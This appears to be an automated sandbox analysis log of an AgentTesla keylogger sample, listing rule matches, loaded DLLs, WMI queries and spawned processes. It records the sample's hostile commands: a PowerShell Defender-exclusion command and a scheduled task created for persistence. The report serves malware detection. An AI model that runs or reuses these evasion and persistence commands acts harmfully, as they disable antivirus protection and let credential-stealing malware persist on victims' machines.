                    Source: hesaphareketi-.exe, 00000008.00000002.4487969528.0000000000403000.00000040.00000400.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamef7121708-72dc-44f1-ae95-b037bc906047.exe4 vs hesaphareketi-.exe
                    Source: hesaphareketi-.exe, 00000008.00000002.4488225500.00000000010F9000.00000004.00000010.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameUNKNOWN_FILET vs hesaphareketi-.exe
                    Source: hesaphareketi-.exe | Binary or memory string: OriginalFilenamellvZ.exeL vs hesaphareketi-.exe
                    Source: hesaphareketi-.exe | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                    Source: 0.2.hesaphareketi-.exe.3474e08.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.hesaphareketi-.exe.3474e08.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                    Source: 9.2.xyodEPhulIrkY.exe.3645378.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 9.2.xyodEPhulIrkY.exe.3645378.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                    Source: 0.2.hesaphareketi-.exe.34af428.1.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.hesaphareketi-.exe.34af428.1.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                    Source: 8.2.hesaphareketi-.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 8.2.hesaphareketi-.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                    Source: 9.2.xyodEPhulIrkY.exe.367f998.3.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 9.2.xyodEPhulIrkY.exe.367f998.3.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                    Source: 0.2.hesaphareketi-.exe.34af428.1.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.hesaphareketi-.exe.34af428.1.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                    Source: 9.2.xyodEPhulIrkY.exe.367f998.3.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 9.2.xyodEPhulIrkY.exe.367f998.3.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                    Source: 9.2.xyodEPhulIrkY.exe.3645378.0.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 9.2.xyodEPhulIrkY.exe.3645378.0.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                    Source: 0.2.hesaphareketi-.exe.3474e08.0.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.hesaphareketi-.exe.3474e08.0.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                    Source: hesaphareketi-.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: xyodEPhulIrkY.exe.0.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: 0.2.hesaphareketi-.exe.3474e08.0.raw.unpack, ekKu0.cs | Cryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.hesaphareketi-.exe.3474e08.0.raw.unpack, vKf1z6NvS.cs | Cryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.hesaphareketi-.exe.3474e08.0.raw.unpack, ZNAvlD7qmXc.cs | Cryptographic APIs: 'CreateDecryptor', 'TransformBlock'
                    Source: 0.2.hesaphareketi-.exe.3474e08.0.raw.unpack, U2doU2.cs | Cryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.hesaphareketi-.exe.3474e08.0.raw.unpack, BgffYko.cs | Cryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.hesaphareketi-.exe.3474e08.0.raw.unpack, HrTdA63.cs | Cryptographic APIs: 'CreateDecryptor'
                    Source: 0.2.hesaphareketi-.exe.3474e08.0.raw.unpack, Vvp22TrBv9g.cs | Cryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.hesaphareketi-.exe.3474e08.0.raw.unpack, Vvp22TrBv9g.cs | Cryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.hesaphareketi-.exe.3474e08.0.raw.unpack, Vvp22TrBv9g.cs | Cryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.hesaphareketi-.exe.3474e08.0.raw.unpack, Vvp22TrBv9g.cs | Cryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.hesaphareketi-.exe.3807c58.3.raw.unpack, F20LWFVHgRjD1hgb3j.cs | Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                    Source: 0.2.hesaphareketi-.exe.3807c58.3.raw.unpack, F20LWFVHgRjD1hgb3j.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.hesaphareketi-.exe.3807c58.3.raw.unpack, F20LWFVHgRjD1hgb3j.cs | Security API names: _0020.AddAccessRule
                    Source: 0.2.hesaphareketi-.exe.3807c58.3.raw.unpack, rOmyU17JDH9qSUKV5w.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@19/15@1/1
                    Source: C:\Users\user\Desktop\hesaphareketi-.exe | File created: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe | Mutant created: NULL
                    Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3668:120:WilError_03
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe | Mutant created: \Sessions\1\BaseNamedObjects\sENXcdAoQRSnuXnopTyHILpEwDv
                    Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7096:120:WilError_03
                    Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5148:120:WilError_03
                    Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4092:120:WilError_03
                    Source: C:\Users\user\Desktop\hesaphareketi-.exe | File created: C:\Users\user\AppData\Local\Temp\tmpE555.tmp
                    Source: hesaphareketi-.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                    Source: C:\Users\user\Desktop\hesaphareketi-.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\Desktop\hesaphareketi-.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\hesaphareketi-.exe | File read: C:\Users\user\Desktop\desktop.ini
                    Source: C:\Users\user\Desktop\hesaphareketi-.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                    Source: hesaphareketi-.exe | ReversingLabs: Detection: 52%
                    Source: C:\Users\user\Desktop\hesaphareketi-.exe | File read: C:\Users\user\Desktop\hesaphareketi-.exe
                    Source: unknown | Process created: C:\Users\user\Desktop\hesaphareketi-.exe "C:\Users\user\Desktop\hesaphareketi-.exe"
                    Source: C:\Users\user\Desktop\hesaphareketi-.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\hesaphareketi-.exe"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\hesaphareketi-.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\hesaphareketi-.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\xyodEPhulIrkY" /XML "C:\Users\user\AppData\Local\Temp\tmpE555.tmp"
                    Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\hesaphareketi-.exe | Process created: C:\Users\user\Desktop\hesaphareketi-.exe "C:\Users\user\Desktop\hesaphareketi-.exe"
                    Source: unknown | Process created: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\xyodEPhulIrkY" /XML "C:\Users\user\AppData\Local\Temp\tmpBF7D.tmp"
                    Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe | Process created: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe "C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe"
                    Source: C:\Users\user\Desktop\hesaphareketi-.exe | Section loaded: mscoree.dll
                    Source: C:\Users\user\Desktop\hesaphareketi-.exe | Section loaded: apphelp.dll
                    Source: C:\Users\user\Desktop\hesaphareketi-.exe | Section loaded: kernel.appcore.dll
                    Source: C:\Users\user\Desktop\hesaphareketi-.exe | Section loaded: version.dll
                    Source: C:\Users\user\Desktop\hesaphareketi-.exe | Section loaded: vcruntime140_clr0400.dll
                    Source: C:\Users\user\Desktop\hesaphareketi-.exe | Section loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\Desktop\hesaphareketi-.exe | Section loaded: uxtheme.dll
                    Source: C:\Users\user\Desktop\hesaphareketi-.exe | Section loaded: windows.storage.dll
                    Source: C:\Users\user\Desktop\hesaphareketi-.exe | Section loaded: wldp.dll
                    Source: C:\Users\user\Desktop\hesaphareketi-.exe | Section loaded: profapi.dll
                    Source: C:\Users\user\Desktop\hesaphareketi-.exe | Section loaded: cryptsp.dll
                    Source: C:\Users\user\Desktop\hesaphareketi-.exe | Section loaded: rsaenh.dll
                    Source: C:\Users\user\Desktop\hesaphareketi-.exe | Section loaded: cryptbase.dll
                    Source: C:\Users\user\Desktop\hesaphareketi-.exe | Section loaded: amsi.dll
                    Source: C:\Users\user\Desktop\hesaphareketi-.exe | Section loaded: userenv.dll
                    Source: C:\Users\user\Desktop\hesaphareketi-.exe | Section loaded: msasn1.dll
                    Source: C:\Users\user\Desktop\hesaphareketi-.exe | Section loaded: gpapi.dll
                    Source: C:\Users\user\Desktop\hesaphareketi-.exe | Section loaded: windowscodecs.dll
                    Source: C:\Users\user\Desktop\hesaphareketi-.exe | Section loaded: propsys.dll
                    Source: C:\Users\user\Desktop\hesaphareketi-.exe | Section loaded: edputil.dll
                    Source: C:\Users\user\Desktop\hesaphareketi-.exe | Section loaded: urlmon.dll
                    Source: C:\Users\user\Desktop\hesaphareketi-.exe | Section loaded: iertutil.dll
                    Source: C:\Users\user\Desktop\hesaphareketi-.exe | Section loaded: srvcli.dll
                    Source: C:\Users\user\Desktop\hesaphareketi-.exe | Section loaded: netutils.dll
                    Source: C:\Users\user\Desktop\hesaphareketi-.exe | Section loaded: windows.staterepositoryps.dll
                    Source: C:\Users\user\Desktop\hesaphareketi-.exe | Section loaded: sspicli.dll
                    Source: C:\Users\user\Desktop\hesaphareketi-.exe | Section loaded: wintypes.dll
                    Source: C:\Users\user\Desktop\hesaphareketi-.exe | Section loaded: appresolver.dll
                    Source: C:\Users\user\Desktop\hesaphareketi-.exe | Section loaded: bcp47langs.dll
                    Source: C:\Users\user\Desktop\hesaphareketi-.exe | Section loaded: slc.dll
                    Source: C:\Users\user\Desktop\hesaphareketi-.exe | Section loaded: sppc.dll
                    Source: C:\Users\user\Desktop\hesaphareketi-.exe | Section loaded: onecorecommonproxystub.dll
                    Source: C:\Users\user\Desktop\hesaphareketi-.exe | Section loaded: onecoreuapcommonproxystub.dll
                    Source: C:\Users\user\Desktop\hesaphareketi-.exe | Section loaded: ntmarta.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
                    Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: kernel.appcore.dll
                    Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: taskschd.dll
                    Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: sspicli.dll
                    Source: C:\Users\user\Desktop\hesaphareketi-.exe | Section loaded: mscoree.dll
                    Source: C:\Users\user\Desktop\hesaphareketi-.exe | Section loaded: kernel.appcore.dll
                    Source: C:\Users\user\Desktop\hesaphareketi-.exe | Section loaded: version.dll
                    Source: C:\Users\user\Desktop\hesaphareketi-.exe | Section loaded: vcruntime140_clr0400.dll
                    Source: C:\Users\user\Desktop\hesaphareketi-.exe | Section loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exe  Section loaded: windows.storage.dll
                    Source: C:\Users\user\Desktop\hesaphareketi-.exe  Section loaded: wldp.dll
                    Source: C:\Users\user\Desktop\hesaphareketi-.exe  Section loaded: profapi.dll
                    Source: C:\Users\user\Desktop\hesaphareketi-.exe  Section loaded: cryptsp.dll
                    Source: C:\Users\user\Desktop\hesaphareketi-.exe  Section loaded: rsaenh.dll
                    Source: C:\Users\user\Desktop\hesaphareketi-.exe  Section loaded: cryptbase.dll
                    Source: C:\Users\user\Desktop\hesaphareketi-.exe  Section loaded: wbemcomn.dll
                    Source: C:\Users\user\Desktop\hesaphareketi-.exe  Section loaded: amsi.dll
                    Source: C:\Users\user\Desktop\hesaphareketi-.exe  Section loaded: userenv.dll
                    Source: C:\Users\user\Desktop\hesaphareketi-.exe  Section loaded: sspicli.dll
                    Source: C:\Users\user\Desktop\hesaphareketi-.exe  Section loaded: vaultcli.dll
                    Source: C:\Users\user\Desktop\hesaphareketi-.exe  Section loaded: wintypes.dll
                    Source: C:\Users\user\Desktop\hesaphareketi-.exe  Section loaded: rasapi32.dll
                    Source: C:\Users\user\Desktop\hesaphareketi-.exe  Section loaded: rasman.dll
                    Source: C:\Users\user\Desktop\hesaphareketi-.exe  Section loaded: rtutils.dll
                    Source: C:\Users\user\Desktop\hesaphareketi-.exe  Section loaded: mswsock.dll
                    Source: C:\Users\user\Desktop\hesaphareketi-.exe  Section loaded: winhttp.dll
                    Source: C:\Users\user\Desktop\hesaphareketi-.exe  Section loaded: ondemandconnroutehelper.dll
                    Source: C:\Users\user\Desktop\hesaphareketi-.exe  Section loaded: iphlpapi.dll
                    Source: C:\Users\user\Desktop\hesaphareketi-.exe  Section loaded: dhcpcsvc6.dll
                    Source: C:\Users\user\Desktop\hesaphareketi-.exe  Section loaded: dhcpcsvc.dll
                    Source: C:\Users\user\Desktop\hesaphareketi-.exe  Section loaded: dnsapi.dll
                    Source: C:\Users\user\Desktop\hesaphareketi-.exe  Section loaded: winnsi.dll
                    Source: C:\Users\user\Desktop\hesaphareketi-.exe  Section loaded: rasadhlp.dll
                    Source: C:\Users\user\Desktop\hesaphareketi-.exe  Section loaded: fwpuclnt.dll
                    Source: C:\Users\user\Desktop\hesaphareketi-.exe  Section loaded: edputil.dll
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe  Section loaded: mscoree.dll
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe  Section loaded: apphelp.dll
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe  Section loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe  Section loaded: version.dll
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe  Section loaded: vcruntime140_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe  Section loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe  Section loaded: uxtheme.dll
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe  Section loaded: windows.storage.dll
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe  Section loaded: wldp.dll
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe  Section loaded: profapi.dll
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe  Section loaded: cryptsp.dll
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe  Section loaded: rsaenh.dll
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe  Section loaded: cryptbase.dll
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe  Section loaded: amsi.dll
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe  Section loaded: userenv.dll
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe  Section loaded: msasn1.dll
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe  Section loaded: gpapi.dll
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe  Section loaded: windowscodecs.dll
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe  Section loaded: propsys.dll
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe  Section loaded: edputil.dll
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe  Section loaded: urlmon.dll
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe  Section loaded: iertutil.dll
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe  Section loaded: srvcli.dll
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe  Section loaded: netutils.dll
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe  Section loaded: windows.staterepositoryps.dll
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe  Section loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe  Section loaded: wintypes.dll
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe  Section loaded: appresolver.dll
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe  Section loaded: bcp47langs.dll
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe  Section loaded: slc.dll
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe  Section loaded: sppc.dll
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe  Section loaded: onecorecommonproxystub.dll
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe  Section loaded: onecoreuapcommonproxystub.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exe  Section loaded: fastprox.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exe  Section loaded: ncobjapi.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exe  Section loaded: wbemcomn.dll
